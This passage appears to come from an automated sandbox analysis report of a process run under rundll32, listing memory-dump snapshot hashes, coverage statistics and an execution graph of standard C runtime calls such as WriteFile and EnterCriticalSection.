                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 527e617ec8a0ad187d220d6171d7e3561279f07bc824febd5c8f9447577e22f5
                                                                          • Instruction ID: 71148983f1fd5ca68574644e9a44264a4b4bd8fcb51d4c6daab685cbc3deb255
                                                                          • Opcode Fuzzy Hash: 527e617ec8a0ad187d220d6171d7e3561279f07bc824febd5c8f9447577e22f5
                                                                          • Instruction Fuzzy Hash: 5901A731A1110557F718AA6899653FF7BB6BBC8744F14842ED046A7280CE765C0297D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.681324490.00000000007AD000.00000040.00000001.sdmp, Offset: 007AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ad000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9ceb039643f3899c4a102afb2be337589b15eb2892566516f506b1b4041fc13
                                                                          • Instruction ID: 5094d42f507d83320967c7f9966ef701fed82fc331f1ab7de7df5ffbfacafd81
                                                                          • Opcode Fuzzy Hash: b9ceb039643f3899c4a102afb2be337589b15eb2892566516f506b1b4041fc13
                                                                          • Instruction Fuzzy Hash: 9601F7B1508740AAD7304A26D884767BBD8EF82724F18861AED464B646C3BD9C45CAB2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c427948851294b312ab73a331afd550451c98e211921465e57d913ec22fcd540
                                                                          • Instruction ID: 7a206a39200ba85c97ebbfc8346a794122ac87f998246d7a6926ef020b2f8317
                                                                          • Opcode Fuzzy Hash: c427948851294b312ab73a331afd550451c98e211921465e57d913ec22fcd540
                                                                          • Instruction Fuzzy Hash: BF01A230B001149BEB28AFA9C8147EFBAE6AFC9644F14842DD405BB390DE75AD05DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edac78e266ae6bbf0453653a782c616b4299631be6bed0b169d540d8d65fedf0
                                                                          • Instruction ID: 07b5de3d3a50c7030e2e8a43fdb380700cc42393f9a347e8b464e6d023ab087a
                                                                          • Opcode Fuzzy Hash: edac78e266ae6bbf0453653a782c616b4299631be6bed0b169d540d8d65fedf0
                                                                          • Instruction Fuzzy Hash: A9F0BB317093102FD721992668D06FBBB6EFFDDA64B04402BE98587285DA146805A2F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7fe931270c9d3286c31b03563b8294db023f9d8543577f12be7927c1f5cb73a1
                                                                          • Instruction ID: 780e17a71caae800eab45c66172fb496ce16382fc6526c156248c58cb79eb67b
                                                                          • Opcode Fuzzy Hash: 7fe931270c9d3286c31b03563b8294db023f9d8543577f12be7927c1f5cb73a1
                                                                          • Instruction Fuzzy Hash: FEF0373B7104208B8B18EF69F4548AE7BEBEBC9675304402AF909C7751DF34AC0A97A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b03e4822d07befa9bf08d15348bf3b7760529d08c54ed58a5b6e59b52db8810
                                                                          • Instruction ID: 996340ceffc90830d5027261af1b406fa37008d4e726ed9960416fffa27060e6
                                                                          • Opcode Fuzzy Hash: 8b03e4822d07befa9bf08d15348bf3b7760529d08c54ed58a5b6e59b52db8810
                                                                          • Instruction Fuzzy Hash: 7F010C70E0520A8FDB54DFA995012FEBBF1BB88304F108269D848E7250E7399941DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36d751c2dcbe2ebc65815e0a251df787ac236612004ec595d911cce1fd7345e7
                                                                          • Instruction ID: 9c0555de92d8590f57c0758b22fb04d3ac286e6b0e8b758155ca427e32950334
                                                                          • Opcode Fuzzy Hash: 36d751c2dcbe2ebc65815e0a251df787ac236612004ec595d911cce1fd7345e7
                                                                          • Instruction Fuzzy Hash: 2FF0CD363093505F8710EF78EC4089B7BFAEFC9264315862AF649CB351EB709D0287A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b87c87f8ef83707a0367f6a8feeec9771936f4519122baa4ab3b655649338110
                                                                          • Instruction ID: 6080326bd740d57bd9de53461df871c71571d24910f9b6dc54a6d241f7f377d7
                                                                          • Opcode Fuzzy Hash: b87c87f8ef83707a0367f6a8feeec9771936f4519122baa4ab3b655649338110
                                                                          • Instruction Fuzzy Hash: E7012C70E052058FDB54DFA985012EEFBF2BF89204F14866EE888F7205E7399541DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.681324490.00000000007AD000.00000040.00000001.sdmp, Offset: 007AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ad000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d4940cc32ded888d8b0ea7b96fa83cdad5b13047282558c7b5debc5821153b85
                                                                          • Instruction ID: df51bfa00928967f7a1ad5031cd6ab6299a436981e0fe892916546b688bf13d1
                                                                          • Opcode Fuzzy Hash: d4940cc32ded888d8b0ea7b96fa83cdad5b13047282558c7b5debc5821153b85
                                                                          • Instruction Fuzzy Hash: B8F0C871404244AEE7208A16DC84767FFD8EF82734F14C55AED454F686C3B99C45CAB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 912f502a819ec1ac3e8f74a86057cdeaaf87e060da95e6f3e9c3b35c61ec60f6
                                                                          • Instruction ID: 5148c806e0312842d022068d233790653390e8934fab890466b49c01a3eeb00c
                                                                          • Opcode Fuzzy Hash: 912f502a819ec1ac3e8f74a86057cdeaaf87e060da95e6f3e9c3b35c61ec60f6
                                                                          • Instruction Fuzzy Hash: 27F046306166450AD718AFB0B0661B53BAEEB8231C712006ED18ACF291EB249C06D3E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c64d9ef2d83ba46b6c02cb952f0c21c0157e75b13ea722e40725ca07c02bd125
                                                                          • Instruction ID: 7965b908713a125e12a7e523854114b1278851d80719430469a559dc52daad7c
                                                                          • Opcode Fuzzy Hash: c64d9ef2d83ba46b6c02cb952f0c21c0157e75b13ea722e40725ca07c02bd125
                                                                          • Instruction Fuzzy Hash: 5BF082313043146F8754EE6DE84495BB7EAEFC46B53518A29F60AC7350EB71EC0187E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 852d31b9e2d04682fe0dd4521a06dcb8b14888cbef4cac0b12728e11685a17f5
                                                                          • Instruction ID: bce927f8d64cbd6953f4bab26db27f9db430315f43512a7a7b2cd676428fdff5
                                                                          • Opcode Fuzzy Hash: 852d31b9e2d04682fe0dd4521a06dcb8b14888cbef4cac0b12728e11685a17f5
                                                                          • Instruction Fuzzy Hash: 7AE0922071425607FF24256465043EEABDA7BC0658F100779CCC6B6682E4D8EC4223D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ffb6285526d7586c99f3a4c8f29b174f7fb4f6470113c29d562b2a3b2c1329d
                                                                          • Instruction ID: fcc48d26c1eaeaaf34e51e2b51beb1e6b08e48c3669c8a5757c231bd08fdc4d0
                                                                          • Opcode Fuzzy Hash: 3ffb6285526d7586c99f3a4c8f29b174f7fb4f6470113c29d562b2a3b2c1329d
                                                                          • Instruction Fuzzy Hash: 2FE0262225E2B00FC3014364A8608E53F684F4B214B0000DBE145DB363C4455D0087A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fcf2c98d573260897f1e92a161bebcd316eba73a2fffa0df268f5c19c68724f4
                                                                          • Instruction ID: e04a514fd4617ca97964f5c4d7647222696ffef2ae0ae449375522ac6f802d81
                                                                          • Opcode Fuzzy Hash: fcf2c98d573260897f1e92a161bebcd316eba73a2fffa0df268f5c19c68724f4
                                                                          • Instruction Fuzzy Hash: D9E0D831A05208EFC740EFB4DD0658E7BA6DF96118B100199E508D7252EF311E009BA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b63b7cdbb82994be295e383727ef06cfe4f05843c3efe78104d54bfa0e17f17
                                                                          • Instruction ID: 8e2e9541f3a98edfb1fb1d2472de3118f71da9c07ae4a1d5cf1b1f660cb16e99
                                                                          • Opcode Fuzzy Hash: 7b63b7cdbb82994be295e383727ef06cfe4f05843c3efe78104d54bfa0e17f17
                                                                          • Instruction Fuzzy Hash: 80E09A31A06284EFCB81EFB0ED4449EBBB6DF4A20432181DAF809DB512CA311F08DF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 946403a54eea91729dfb5b5f8e18f4325d3c8a948a06cf3e98cd1c49f2b0227f
                                                                          • Instruction ID: 2f7941c6aec2d665ab3c8628eae7cf30dc842ccc2057960238de3c6332937082
                                                                          • Opcode Fuzzy Hash: 946403a54eea91729dfb5b5f8e18f4325d3c8a948a06cf3e98cd1c49f2b0227f
                                                                          • Instruction Fuzzy Hash: FCD097322D62041FD306A790B8028DA3F799B8633070800ABF444CF2B3EE2A0C53C3E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef12dcabf005168d90681493682feebc2d786bca3e0750c01fcad06d829a6075
                                                                          • Instruction ID: 9c5cee0258c4bd541697edc388c9a97eaadcc28164793d82c2e18166dcc01514
                                                                          • Opcode Fuzzy Hash: ef12dcabf005168d90681493682feebc2d786bca3e0750c01fcad06d829a6075
                                                                          • Instruction Fuzzy Hash: 85D09722A219502BD32432B430453E7AB8CDB89038F104036CD1CD7201C828880303D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5616e636aa576753ab42283677a3fd304b19497a74ae9125ae876d772763660
                                                                          • Instruction ID: b57190b241521b8a7ab11ebdf2a6870bdeae12b4aaf6afe302896288b2a107ad
                                                                          • Opcode Fuzzy Hash: b5616e636aa576753ab42283677a3fd304b19497a74ae9125ae876d772763660
                                                                          • Instruction Fuzzy Hash: 45D0A7353354305BC204536CD4409A9339DEB4D71C7111856F206C7360CE55BC0003D8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19eefce1fd782b267aafcd82e5694aeb49e494fb4f8efc073194439cedf055c8
                                                                          • Instruction ID: e9fae47eb82a25d829b3d1a8b1738b12d8f667aadd7815ac806ae57200f8d485
                                                                          • Opcode Fuzzy Hash: 19eefce1fd782b267aafcd82e5694aeb49e494fb4f8efc073194439cedf055c8
                                                                          • Instruction Fuzzy Hash: DCD0A93232612C2B5204A2A998248FE769ABB856B83605427B64093360EE61BC01A6E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
• API String ID:
• Opcode ID: 00c14ab45c3422138c7ccc40c0611eed623bc12b66d7d8d6936a0a38f344c3aa
• Instruction ID: 6bbf2b9cf83c439a5d3e76d67e0ee2065e117cecf186cc4e76a49515311573ec
• Opcode Fuzzy Hash: 00c14ab45c3422138c7ccc40c0611eed623bc12b66d7d8d6936a0a38f344c3aa
• Instruction Fuzzy Hash: 97D05B3090120CEF8780EFF4DA0645F77B6EB45218B10459DE909D3211EF311F049B50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ad698dc7c8f7f15e660da83e0693dc0701e3f18f524e2118bf529644bb8b4ce
• Instruction ID: c693feb89195084d06da0272edd9a3375fa8840645d639be346a71f0bc521a10
• Opcode Fuzzy Hash: 4ad698dc7c8f7f15e660da83e0693dc0701e3f18f524e2118bf529644bb8b4ce
• Instruction Fuzzy Hash: 68D05B3190110CEF8740EFB4ED0555EB7FADB45204710859AF509D7201DE311F009F55
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 613892f9a7abda019b5cb727580ac9307c3fa403238056cd14773981ef7867e6
• Instruction ID: 2895a2eaf1b2e2ce39f66bbe3201dbbcd88b382e304bc519fac2fee203d562bc
• Opcode Fuzzy Hash: 613892f9a7abda019b5cb727580ac9307c3fa403238056cd14773981ef7867e6
• Instruction Fuzzy Hash: 6FC0807249E7406FF30603540C834E63F20E627718389D39BC040DD4D3910F5407D271
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.2%
Total number of Nodes: 1889
Total number of Limit Nodes: 11

Graph

LeaveCriticalSection 7662->7667 7663->7650 7665 3f4b3b LeaveCriticalSection 7663->7665 7665->7653 7666->7658 7667->7663 8793 3f2bbd 8794 3f2bf2 8793->8794 8795 3f2bcd 8793->8795 8795->8794 8796 3f4ce8 IsInExceptionSpec 62 API calls 8795->8796 8797 3f2bfd 8796->8797 8800 3f3d97 SetUnhandledExceptionFilter 8797->8800 8799 3f2c08 8800->8799 8235 3f5d78 8242 3f6ef8 8235->8242 8238 3f5d8b 8239 3f1b1f __getptd_noexit 58 API calls 8238->8239 8241 3f5d96 8239->8241 8255 3f6f01 8242->8255 8244 3f5d7d 8244->8238 8245 3f760a 8244->8245 8246 3f7616 __initptd 8245->8246 8247 3f49d1 __lock 58 API calls 8246->8247 8248 3f7622 8247->8248 8249 3f7687 8248->8249 8253 3f765b DeleteCriticalSection 8248->8253 8283 3f81d7 8248->8283 8296 3f769e 8249->8296 8251 3f7693 __initptd 8251->8238 8254 3f1b1f __getptd_noexit 58 API calls 8253->8254 8254->8248 8256 3f6f0d __initptd 8255->8256 8257 3f49d1 __lock 58 API calls 8256->8257 8264 3f6f1c 8257->8264 8258 3f6fba 8273 3f6fdc 8258->8273 8261 3f6fc6 __initptd 8261->8244 8263 3f6e4e 82 API calls __fflush_nolock 8263->8264 8264->8258 8264->8263 8265 3f5dde 8264->8265 8270 3f6fa9 8264->8270 8266 3f5dff EnterCriticalSection 8265->8266 8267 3f5de9 8265->8267 8266->8264 8268 3f49d1 __lock 58 API calls 8267->8268 8269 3f5df2 8268->8269 8269->8264 8276 3f5e48 8270->8276 8272 3f6fb7 8272->8264 8282 3f4b3b LeaveCriticalSection 8273->8282 8275 3f6fe3 8275->8261 8277 3f5e69 LeaveCriticalSection 8276->8277 8278 3f5e56 8276->8278 8277->8272 8281 3f4b3b LeaveCriticalSection 8278->8281 8280 3f5e66 8280->8272 8281->8280 8282->8275 8284 3f81e3 __initptd 8283->8284 8285 3f820f 8284->8285 8286 3f81f7 8284->8286 8292 3f8207 __initptd 8285->8292 8299 3f5d9f 8285->8299 8287 3f2218 __cftoe_l 58 API calls 8286->8287 8289 3f81fc 8287->8289 8291 3f29e1 __cftoe_l 9 API calls 8289->8291 8291->8292 8292->8248 8548 3f4b3b LeaveCriticalSection 8296->8548 8298 3f76a5 8298->8251 8300 3f5daf 8299->8300 8301 3f5dd1 EnterCriticalSection 8299->8301 8300->8301 8303 3f5db7 
8300->8303 8302 3f5dc7 8301->8302 8305 3f816b 8302->8305 8304 3f49d1 __lock 58 API calls 8303->8304 8304->8302 8306 3f818e 8305->8306 8307 3f817a 8305->8307 8309 3f818a 8306->8309 8324 3f6e94 8306->8324 8308 3f2218 __cftoe_l 58 API calls 8307->8308 8311 3f817f 8308->8311 8321 3f8246 8309->8321 8313 3f29e1 __cftoe_l 9 API calls 8311->8313 8313->8309 8317 3f81a8 8341 3f88db 8317->8341 8319 3f81ae 8319->8309 8320 3f1b1f __getptd_noexit 58 API calls 8319->8320 8320->8309 8541 3f5e0e 8321->8541 8323 3f824c 8323->8292 8325 3f6ea7 8324->8325 8326 3f6ecb 8324->8326 8325->8326 8327 3f6dd6 __fflush_nolock 58 API calls 8325->8327 8330 3f8a50 8326->8330 8328 3f6ec4 8327->8328 8367 3f77c5 8328->8367 8331 3f81a2 8330->8331 8332 3f8a5d 8330->8332 8334 3f6dd6 8331->8334 8332->8331 8333 3f1b1f __getptd_noexit 58 API calls 8332->8333 8333->8331 8335 3f6df5 8334->8335 8336 3f6de0 8334->8336 8335->8317 8337 3f2218 __cftoe_l 58 API calls 8336->8337 8338 3f6de5 8337->8338 8339 3f29e1 __cftoe_l 9 API calls 8338->8339 8340 3f6df0 8339->8340 8340->8317 8342 3f88e7 __initptd 8341->8342 8343 3f890b 8342->8343 8344 3f88f4 8342->8344 8346 3f8996 8343->8346 8348 3f891b 8343->8348 8345 3f21e4 __free_osfhnd 58 API calls 8344->8345 8347 3f88f9 8345->8347 8349 3f21e4 __free_osfhnd 58 API calls 8346->8349 8351 3f2218 __cftoe_l 58 API calls 8347->8351 8352 3f8939 8348->8352 8353 3f8943 8348->8353 8350 3f893e 8349->8350 8356 3f2218 __cftoe_l 58 API calls 8350->8356 8363 3f8900 __initptd 8351->8363 8354 3f21e4 __free_osfhnd 58 API calls 8352->8354 8355 3f827b ___lock_fhandle 59 API calls 8353->8355 8354->8350 8357 3f8949 8355->8357 8358 3f89a2 8356->8358 8359 3f895c 8357->8359 8360 3f8967 8357->8360 8361 3f29e1 __cftoe_l 9 API calls 8358->8361 8513 3f89b6 8359->8513 8364 3f2218 __cftoe_l 58 API calls 8360->8364 8361->8363 8363->8319 8365 3f8962 8364->8365 8528 3f898e 8365->8528 8368 3f77d1 __initptd 8367->8368 8369 3f77de 8368->8369 8370 3f77f5 8368->8370 8395 3f21e4 8369->8395 8372 3f7894 8370->8372 
8375 3f7809 8370->8375 8373 3f21e4 __free_osfhnd 58 API calls 8372->8373 8376 3f782c 8373->8376 8378 3f7827 8375->8378 8379 3f7831 8375->8379 8382 3f2218 __cftoe_l 58 API calls 8376->8382 8377 3f2218 __cftoe_l 58 API calls 8390 3f77ea __initptd 8377->8390 8381 3f21e4 __free_osfhnd 58 API calls 8378->8381 8398 3f827b 8379->8398 8381->8376 8384 3f78a0 8382->8384 8383 3f7837 8385 3f785d 8383->8385 8386 3f784a 8383->8386 8387 3f29e1 __cftoe_l 9 API calls 8384->8387 8389 3f2218 __cftoe_l 58 API calls 8385->8389 8407 3f78b4 8386->8407 8387->8390 8392 3f7862 8389->8392 8390->8326 8391 3f7856 8466 3f788c 8391->8466 8393 3f21e4 __free_osfhnd 58 API calls 8392->8393 8393->8391 8396 3f2eb4 __getptd_noexit 58 API calls 8395->8396 8397 3f21e9 8396->8397 8397->8377 8399 3f8287 __initptd 8398->8399 8400 3f82d6 EnterCriticalSection 8399->8400 8401 3f49d1 __lock 58 API calls 8399->8401 8402 3f82fc __initptd 8400->8402 8404 3f82ac 8401->8404 8402->8383 8403 3f82c4 8469 3f8300 8403->8469 8404->8403 8405 3f3a9e ___lock_fhandle InitializeCriticalSectionAndSpinCount 8404->8405 8405->8403 8408 3f78c1 __write_nolock 8407->8408 8409 3f791f 8408->8409 8410 3f7900 8408->8410 8454 3f78f5 8408->8454 8415 3f7977 8409->8415 8416 3f795b 8409->8416 8412 3f21e4 __free_osfhnd 58 API calls 8410->8412 8411 3f1b07 __cftoe_l 6 API calls 8413 3f8115 8411->8413 8414 3f7905 8412->8414 8413->8391 8418 3f2218 __cftoe_l 58 API calls 8414->8418 8419 3f7990 8415->8419 8473 3f8467 8415->8473 8417 3f21e4 __free_osfhnd 58 API calls 8416->8417 8420 3f7960 8417->8420 8421 3f790c 8418->8421 8482 3f6dfa 8419->8482 8424 3f2218 __cftoe_l 58 API calls 8420->8424 8425 3f29e1 __cftoe_l 9 API calls 8421->8425 8427 3f7967 8424->8427 8425->8454 8426 3f799e 8428 3f7cf7 8426->8428 8432 3f2e9c ___InternalCxxFrameHandler 58 API calls 8426->8432 8431 3f29e1 __cftoe_l 9 API calls 8427->8431 8429 3f808a WriteFile 8428->8429 8430 3f7d15 8428->8430 8433 3f7cea GetLastError 8429->8433 8447 3f7cb7 8429->8447 8434 3f7d2b 8430->8434 8435 
3f7e39 8430->8435 8431->8454 8436 3f79ca GetConsoleMode 8432->8436 8433->8447 8439 3f7d9a WriteFile 8434->8439 8443 3f80c3 8434->8443 8434->8447 8452 3f7f2e 8435->8452 8453 3f7e44 8435->8453 8436->8428 8438 3f7a09 8436->8438 8437 3f7a19 GetConsoleCP 8437->8443 8461 3f7a48 8437->8461 8438->8428 8438->8437 8439->8433 8439->8434 8440 3f2218 __cftoe_l 58 API calls 8441 3f80f1 8440->8441 8449 3f21e4 __free_osfhnd 58 API calls 8441->8449 8442 3f7e17 8444 3f80ba 8442->8444 8445 3f7e22 8442->8445 8443->8440 8443->8454 8494 3f21f7 8444->8494 8450 3f2218 __cftoe_l 58 API calls 8445->8450 8446 3f7fa3 WideCharToMultiByte 8446->8433 8446->8452 8447->8442 8447->8443 8447->8454 8448 3f7ea9 WriteFile 8448->8433 8448->8453 8449->8454 8455 3f7e27 8450->8455 8452->8443 8452->8446 8452->8447 8456 3f7ff2 WriteFile 8452->8456 8453->8443 8453->8447 8453->8448 8454->8411 8457 3f21e4 __free_osfhnd 58 API calls 8455->8457 8456->8452 8459 3f8045 GetLastError 8456->8459 8457->8454 8459->8452 8460 3f85cf 60 API calls __write_nolock 8460->8461 8461->8433 8461->8447 8461->8460 8462 3f7b31 WideCharToMultiByte 8461->8462 8464 3f85e7 WriteConsoleW CreateFileW __putwch_nolock 8461->8464 8465 3f7bc6 WriteFile 8461->8465 8491 3f8456 8461->8491 8462->8447 8463 3f7b6c WriteFile 8462->8463 8463->8433 8463->8461 8464->8461 8465->8433 8465->8461 8512 3f83f6 LeaveCriticalSection 8466->8512 8468 3f7892 8468->8390 8472 3f4b3b LeaveCriticalSection 8469->8472 8471 3f8307 8471->8400 8472->8471 8499 3f838f 8473->8499 8475 3f8477 8476 3f847f 8475->8476 8477 3f8490 SetFilePointerEx 8475->8477 8480 3f2218 __cftoe_l 58 API calls 8476->8480 8478 3f84a8 GetLastError 8477->8478 8479 3f8484 8477->8479 8481 3f21f7 __dosmaperr 58 API calls 8478->8481 8479->8419 8480->8479 8481->8479 8483 3f6e05 8482->8483 8485 3f6e12 8482->8485 8484 3f2218 __cftoe_l 58 API calls 8483->8484 8486 3f6e0a 8484->8486 8487 3f6e1e 8485->8487 8488 3f2218 __cftoe_l 58 API calls 8485->8488 8486->8426 8487->8426 8489 3f6e3f 8488->8489 8490 3f29e1 
